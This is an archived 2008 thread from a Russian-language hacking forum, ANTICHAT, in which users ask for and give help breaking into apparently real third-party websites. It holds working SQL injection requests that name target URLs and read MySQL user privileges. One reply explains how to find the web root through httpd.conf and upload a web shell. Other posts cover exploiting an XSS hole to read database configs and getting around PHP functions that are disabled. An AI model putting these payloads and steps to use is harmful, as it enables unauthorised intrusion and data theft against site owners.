ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

25.04.2008, 22:00
|
|
Новичок
Регистрация: 29.03.2008
Сообщений: 7
Провел на форуме: 78255
Репутация:
0
|
|
Сообщение от jokester
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация?  )
Вот так не бывает:
"cybersales.information_schema.tables"
information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно
Кажется понял. Ты хочешь сказать, что по запросу select+table_name+from+information_schema.tables выводятся ВСЕ таблицы ВСЕХ баз данных? Не думаю я. Таблиц по этому запросу выводится штук 20. А баз дынных есть штук 45.
Последний раз редактировалось cyberia; 25.04.2008 в 22:12..
|
|
|

25.04.2008, 22:00
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме: 279406
Репутация:
37
|
|
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))
Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
|
|
|

25.04.2008, 23:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
http://lasgy.tln.edu.ee/?smg=news&ca=2989+or+1%3D1+--+
Сканер показал слепую инъекцию,но у мя ничё не вышло тут. Наяба ? о_О
P.S. : Есть также дыра,позволяющая выполнить произвольный код в OpenSSH.тоже от сканера
Уязвимость существует из-за ошибки в процедуре обработки служебных сигналов. Уязвимость позволяет злоумышленнику аварийно завершить работу сервиса OpenSSH или выполнить произвольный код в системе. Для эксплуатации уязвимости необходимо чтобы сервис использовал GSSAPI аутентификацию (параметр GSSAPIAuthentication в файле конфигурации).
Прошу не бить за лог:Р,прост сплойта в нете не нашёл,а сам написать имхо не могу =_=(Знал бы не спрашивал =)).Есть у кого какие идеи ?)
Последний раз редактировалось Велемир; 25.04.2008 в 23:27..
|
|
|

26.04.2008, 10:01
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме: 1668307
Репутация:
114
|
|
Сообщение от Thrasher88
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))
Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
почитай вот эти статьи, найдешь много полезно про XSS:
https://forum.antichat.ru/showthread.php?t=11807
https://forum.antichat.ru/showthread.php?t=44125
https://forum.antichat.ru/showthread.php?t=42951
|
|
|

26.04.2008, 12:31
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме: 380957
Репутация:
56
|
|
привет всем!
что делать если при таком запросе -9999+UNION+SELECT+1,2,user(),4/*
ну или место юзер датабэйс и.т.д. просто появляется чистый экран.
|
|
|

26.04.2008, 12:42
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
ссылку
|
|
|

26.04.2008, 12:59
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме: 97223
Репутация:
5
|
|
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* как найти полную директорию для записи файла и заливки шелла????
|
|
|

26.04.2008, 13:12
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме: 7192869
Репутация:
3033
|
|
У тебя рутовый пользователь
Код:
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(user()+using+cp1251)+from+mysql.user/* HTTP/1.0
и есть file_priv=Y, значит можешь читать\писать файлы
Код:
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(file_priv+using+cp1251)+from+mysql.user+where+user='root'/* HTTP/1.0
Причем маджик_квотс_гпс отключены.
Твои действия: ищешь httpd.config там ищешь пути до virtualhosts, где в document_root будет лежать полный путь, далее с заливкой шелла по обстоятельствам: можно либо почитать исходники авторизации админки или какие нибудь конфиги, либо влить прямым запросом - пути и способ залить шелл через запрос можно найти здесь на форуме
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 26.04.2008 в 13:15..
|
|
|

26.04.2008, 14:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
немного поправлю, точное название httpd.conf или vhosts.conf
кстати наличие magic quotes становится для меня во многих случаях не актуально
https://forum.antichat.ru/showpost.php?p=663815&postcount=39
__________________
Карфаген должен быть разрушен...
|
|
|

26.04.2008, 16:27
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Сообщение от Спайдер
омг! пиздец
выполни phpinfo() , найди поля disable functions и скопипасть сюда
disable_function:
Local Value.
system,exec,shell_exec,passthru,popen
Master Value
system,exec,shell_exec,passthru,popen
Дальше как?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|